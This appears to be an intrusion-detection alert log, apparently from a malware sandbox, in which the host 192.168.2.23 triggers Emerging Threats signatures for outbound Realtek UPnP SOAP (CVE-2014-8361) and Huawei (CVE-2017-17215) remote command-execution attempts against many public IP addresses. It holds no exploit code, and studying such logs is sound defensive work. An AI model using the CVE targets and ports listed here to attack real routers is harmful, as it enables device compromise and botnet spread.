                                      07/20/24-23:01:55.863393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4871652869192.168.2.2347.97.62.221
                                      07/20/24-23:01:44.550538TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3838452869192.168.2.23198.213.74.132
                                      07/20/24-23:02:08.084135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3633852869192.168.2.2382.228.21.159
                                      07/20/24-23:02:02.476638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23750452869192.168.2.2353.255.54.255
                                      07/20/24-23:01:01.904524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707837215192.168.2.23197.24.224.193
                                      07/20/24-23:01:21.951975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341037215192.168.2.23203.123.59.88
                                      07/20/24-23:01:55.154049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5812252869192.168.2.2369.193.122.132
                                      07/20/24-23:01:54.829737TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597052869192.168.2.2396.119.211.11
                                      07/20/24-23:01:24.883172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655237215192.168.2.23181.24.138.22
                                      07/20/24-23:01:11.816294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659037215192.168.2.23157.147.43.148
                                      07/20/24-23:01:45.432263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3804052869192.168.2.23199.44.188.95
                                      07/20/24-23:01:47.856443TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4452652869192.168.2.23201.73.178.106
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787237215192.168.2.23157.134.165.10
                                      07/20/24-23:01:40.331150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141837215192.168.2.23197.93.167.88
                                      07/20/24-23:01:42.673065TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23699452869192.168.2.23158.212.171.84
                                      07/20/24-23:01:08.611391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4964452869192.168.2.2354.68.100.131
                                      07/20/24-23:01:00.638418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739237215192.168.2.23197.151.222.142
                                      07/20/24-23:02:09.668312TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613940852869192.168.2.23199.12.206.97
                                      07/20/24-23:01:44.020551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614632452869192.168.2.23150.244.130.144
                                      07/20/24-23:01:44.274813TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6074852869192.168.2.2343.229.235.45
                                      07/20/24-23:01:42.762943TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24596252869192.168.2.23145.71.96.96
                                      07/20/24-23:01:44.811941TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4336652869192.168.2.2378.252.101.116
                                      07/20/24-23:01:55.572517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4520852869192.168.2.23213.9.81.218
                                      07/20/24-23:01:08.620788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5701452869192.168.2.23164.236.243.93
                                      07/20/24-23:01:49.228425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615558652869192.168.2.23216.13.41.148
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874237215192.168.2.23197.251.31.217
                                      07/20/24-23:01:20.591832TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24591252869192.168.2.2327.150.162.76
                                      07/20/24-23:01:44.749294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25602052869192.168.2.23180.183.76.230
                                      07/20/24-23:01:25.595910TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614700252869192.168.2.2362.157.173.255
                                      07/20/24-23:01:41.331701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5074052869192.168.2.23159.130.44.143
                                      07/20/24-23:01:08.606848TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25366052869192.168.2.239.134.98.50
                                      07/20/24-23:01:45.175511TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614552052869192.168.2.2342.208.30.144
                                      07/20/24-23:01:00.645051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543837215192.168.2.23197.233.33.61
                                      07/20/24-23:01:50.030683TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615674852869192.168.2.23125.188.157.139
                                      07/20/24-23:01:42.891313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4933052869192.168.2.23155.182.30.66
                                      07/20/24-23:01:53.432917TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613876652869192.168.2.2374.243.121.184
                                      07/20/24-23:01:42.557694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5370652869192.168.2.23185.161.24.118
                                      07/20/24-23:01:47.023698TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5620252869192.168.2.2349.152.226.6
                                      07/20/24-23:01:47.455725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3952452869192.168.2.2367.67.248.34
                                      07/20/24-23:01:01.484620TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4122852869192.168.2.239.190.28.75
                                      07/20/24-23:01:04.973966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389652869192.168.2.23219.114.72.114
                                      07/20/24-23:02:19.406496TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4839852869192.168.2.23190.157.219.101
                                      07/20/24-23:02:11.700204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3857452869192.168.2.2347.13.214.247
                                      07/20/24-23:01:41.258403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614117652869192.168.2.235.95.241.47
                                      07/20/24-23:01:44.099799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615438652869192.168.2.23216.41.229.158
                                      07/20/24-23:01:42.164492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4865652869192.168.2.2375.52.105.57
                                      07/20/24-23:01:41.290281TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3522252869192.168.2.23175.222.36.60
                                      07/20/24-23:01:04.100971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928237215192.168.2.23197.119.219.206
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370837215192.168.2.23157.159.217.211
                                      07/20/24-23:01:08.626717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3364052869192.168.2.2357.179.102.199
                                      07/20/24-23:01:41.238000TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613846452869192.168.2.2385.239.208.54
                                      07/20/24-23:01:42.062724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25520052869192.168.2.23194.5.145.232
                                      07/20/24-23:01:57.392094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613688452869192.168.2.23158.188.68.37
                                      07/20/24-23:01:41.533243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4486852869192.168.2.2378.42.251.42
                                      07/20/24-23:01:10.585824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3725052869192.168.2.2382.106.122.253
                                      07/20/24-23:01:43.133950TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613913652869192.168.2.23187.122.130.75
                                      07/20/24-23:01:02.079114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548437215192.168.2.23106.214.178.206
                                      07/20/24-23:01:25.549014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616031252869192.168.2.23155.220.6.134
                                      07/20/24-23:01:56.324972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4659452869192.168.2.2314.138.152.232
                                      07/20/24-23:02:02.291967TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25704252869192.168.2.23135.85.2.136
                                      07/20/24-23:01:47.912435TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615543452869192.168.2.23130.200.160.126
                                      07/20/24-23:01:08.585790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5853852869192.168.2.2334.53.37.254
                                      07/20/24-23:01:34.045144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091837215192.168.2.2341.42.73.158
                                      07/20/24-23:01:42.462291TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23995252869192.168.2.23186.129.147.154
                                      07/20/24-23:01:01.464786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5263452869192.168.2.23212.114.230.189
                                      07/20/24-23:01:08.903232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25497652869192.168.2.23164.189.55.135
                                      07/20/24-23:01:58.202290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3393052869192.168.2.2354.42.165.29
                                      07/20/24-23:01:11.634077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552637215192.168.2.23193.53.98.68
                                      07/20/24-23:01:27.654173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506837215192.168.2.23197.113.24.234
                                      07/20/24-23:01:11.817298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014637215192.168.2.2379.233.85.196
                                      07/20/24-23:01:44.355606TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613809452869192.168.2.2343.113.255.232
                                      07/20/24-23:01:25.783904TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5539852869192.168.2.2397.247.179.245
                                      07/20/24-23:01:12.806235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4015052869192.168.2.23119.4.44.94
                                      07/20/24-23:01:43.084243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3428252869192.168.2.2343.122.229.51
                                      07/20/24-23:01:48.445925TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24308852869192.168.2.23185.97.134.51
                                      07/20/24-23:01:45.432263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23410652869192.168.2.23134.101.23.241
                                      07/20/24-23:01:42.151857TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4472252869192.168.2.23111.193.202.8
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750037215192.168.2.23157.244.205.180
                                      07/20/24-23:01:51.875785TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25931252869192.168.2.23159.88.48.35
                                      07/20/24-23:01:53.697003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5518252869192.168.2.23138.65.97.97
                                      07/20/24-23:02:11.703257TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5206852869192.168.2.2392.69.223.90
                                      07/20/24-23:02:03.112911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4368852869192.168.2.2380.223.189.233
                                      07/20/24-23:01:42.616434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3294652869192.168.2.23197.25.236.70
                                      07/20/24-23:01:47.443306TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4699452869192.168.2.23196.221.214.48
                                      07/20/24-23:01:00.636533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290437215192.168.2.2341.190.181.48
                                      07/20/24-23:01:43.066571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4659852869192.168.2.23146.167.250.116
                                      07/20/24-23:01:49.203134TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614819252869192.168.2.2377.112.72.60
                                      07/20/24-23:01:11.816521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880837215192.168.2.23217.234.58.254
                                      07/20/24-23:01:31.976795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714837215192.168.2.23197.17.160.123
                                      07/20/24-23:01:40.301143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025637215192.168.2.23157.64.8.64
                                      07/20/24-23:01:04.212553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055237215192.168.2.2338.140.206.136
                                      07/20/24-23:01:20.132510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797637215192.168.2.23197.27.213.242
                                      07/20/24-23:01:45.098864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5147252869192.168.2.23159.130.44.143
                                      07/20/24-23:01:55.716125TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613657652869192.168.2.23172.44.248.130
                                      07/20/24-23:02:03.159117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3873052869192.168.2.23183.120.27.200
                                      07/20/24-23:01:44.590674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4658452869192.168.2.23150.244.130.144
                                      07/20/24-23:01:08.611774TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25963452869192.168.2.23151.194.118.37
                                      07/20/24-23:02:07.236630TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615128852869192.168.2.23144.66.178.116
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050437215192.168.2.23197.142.168.90
                                      07/20/24-23:01:31.322110TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5198452869192.168.2.2371.185.104.236
                                      07/20/24-23:01:43.607934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5982252869192.168.2.23160.195.41.193
                                      07/20/24-23:01:44.700808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25501252869192.168.2.23180.13.32.83
                                      07/20/24-23:01:46.913205TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24707052869192.168.2.2342.208.30.144
                                      07/20/24-23:01:31.974907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930837215192.168.2.23157.77.110.3
                                      07/20/24-23:01:51.096458TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615946852869192.168.2.23163.50.116.249
                                      07/20/24-23:01:04.147433TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613455852869192.168.2.23201.250.207.152
                                      07/20/24-23:01:20.591485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5257052869192.168.2.23100.41.144.113
                                      07/20/24-23:01:45.094539TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616054452869192.168.2.2369.102.162.227
                                      07/20/24-23:00:59.168569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814237215192.168.2.23197.21.129.208
                                      07/20/24-23:01:02.055683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720837215192.168.2.2341.201.15.228
                                      07/20/24-23:01:02.272048TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4221652869192.168.2.2364.43.73.86
                                      07/20/24-23:01:04.228868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3336237215192.168.2.23182.253.24.216
                                      07/20/24-23:01:48.255782TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24163052869192.168.2.23146.185.97.186
                                      07/20/24-23:01:43.243465TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25727052869192.168.2.2361.42.34.219
                                      07/20/24-23:01:44.470424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613505852869192.168.2.23217.231.155.95
                                      07/20/24-23:02:16.745304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23284052869192.168.2.23129.246.142.35
                                      07/20/24-23:01:57.429251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24098252869192.168.2.23206.37.245.255
                                      07/20/24-23:01:01.881568TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613586052869192.168.2.2377.77.58.220
                                      07/20/24-23:02:01.320866TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615875452869192.168.2.23202.174.156.78
                                      07/20/24-23:01:42.740527TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3691852869192.168.2.2335.56.95.76
                                      07/20/24-23:01:43.557453TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23959252869192.168.2.23197.85.104.215
                                      07/20/24-23:01:45.098864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4226652869192.168.2.23197.132.250.53
                                      07/20/24-23:01:53.059916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5415452869192.168.2.2327.236.237.70
                                      07/20/24-23:01:24.867858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449037215192.168.2.2341.99.111.146
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400037215192.168.2.2341.60.131.118
                                      07/20/24-23:01:43.555329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3394452869192.168.2.23217.141.116.135
                                      07/20/24-23:01:46.340763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615350652869192.168.2.23203.124.141.209
                                      07/20/24-23:01:42.762943TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25329652869192.168.2.2394.66.88.32
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344837215192.168.2.23157.156.131.187
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997637215192.168.2.2341.33.245.21
                                      07/20/24-23:02:01.929550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25527252869192.168.2.23219.135.178.135
                                      07/20/24-23:01:07.075937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071437215192.168.2.2341.45.118.19
                                      07/20/24-23:01:51.400635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613511052869192.168.2.2343.224.149.155
                                      07/20/24-23:00:57.221026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613637215192.168.2.23197.12.204.52
                                      07/20/24-23:01:41.567823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5321252869192.168.2.2354.140.169.156
                                      07/20/24-23:01:46.329269TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615699652869192.168.2.23173.172.122.41
                                      07/20/24-23:01:50.901722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5834452869192.168.2.23162.93.73.144
                                      07/20/24-23:01:42.374542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3860252869192.168.2.23165.86.188.195
                                      07/20/24-23:01:54.693625TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6083052869192.168.2.23118.111.39.192
                                      07/20/24-23:01:45.164161TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24248252869192.168.2.2386.220.55.191
                                      07/20/24-23:01:34.064573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069637215192.168.2.23157.124.21.88
                                      07/20/24-23:01:42.104533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5184452869192.168.2.2368.175.73.118
                                      07/20/24-23:01:08.559315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4453852869192.168.2.23161.98.32.121
                                      07/20/24-23:01:25.940871TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019252869192.168.2.2397.255.56.23
                                      07/20/24-23:01:27.653028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901437215192.168.2.23197.100.29.197
                                      07/20/24-23:01:27.660099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359437215192.168.2.23157.156.179.148
                                      07/20/24-23:01:45.667238TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613324052869192.168.2.2324.80.173.172
                                      07/20/24-23:01:41.372363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4316252869192.168.2.2347.30.224.199
                                      07/20/24-23:01:11.631728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237437215192.168.2.23106.4.213.108
                                      07/20/24-23:01:52.838688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5280652869192.168.2.2323.8.251.245
                                      07/20/24-23:01:41.467111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3726852869192.168.2.23102.134.118.47
                                      07/20/24-23:01:42.758954TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5962052869192.168.2.2352.97.71.90
                                      07/20/24-23:01:51.500991TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24997852869192.168.2.23204.255.198.47
                                      07/20/24-23:01:08.693187TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4618052869192.168.2.2327.181.35.71
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478837215192.168.2.23148.60.185.225
                                      07/20/24-23:01:55.870348TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23942852869192.168.2.23157.175.172.46
                                      07/20/24-23:01:42.687128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3825452869192.168.2.2369.23.248.153
                                      07/20/24-23:01:51.483441TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613391652869192.168.2.2396.23.98.70
                                      07/20/24-23:01:45.775798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4026252869192.168.2.23126.245.117.149
                                      07/20/24-23:01:08.563906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25083252869192.168.2.23191.79.195.70
                                      07/20/24-23:01:53.392806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615955452869192.168.2.2323.227.245.165
                                      07/20/24-23:01:02.104572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488237215192.168.2.2341.174.61.133
                                      07/20/24-23:01:20.603553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5997252869192.168.2.23218.129.227.171
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3408837215192.168.2.2341.53.235.233
                                      07/20/24-23:01:43.078618TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25104252869192.168.2.23207.164.129.53
                                      07/20/24-23:01:00.635367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939237215192.168.2.23155.165.181.96
                                      07/20/24-23:01:11.636599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250637215192.168.2.23157.115.1.86
                                      07/20/24-23:02:04.133789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4413852869192.168.2.23190.159.104.180
                                      07/20/24-23:01:12.811667TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23669852869192.168.2.23106.229.130.40
                                      07/20/24-23:01:42.656962TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24299852869192.168.2.2319.15.33.52
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493437215192.168.2.23197.160.155.29
                                      07/20/24-23:01:42.452119TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24028652869192.168.2.23213.180.197.99
                                      07/20/24-23:01:42.142802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613946652869192.168.2.23138.38.220.62
                                      07/20/24-23:01:53.909434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24627052869192.168.2.2349.96.236.62
                                      07/20/24-23:01:54.277123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5539052869192.168.2.23222.178.130.155
                                      07/20/24-23:01:02.104571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239437215192.168.2.2341.218.93.135
                                      07/20/24-23:01:10.501913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615556652869192.168.2.2385.213.237.39
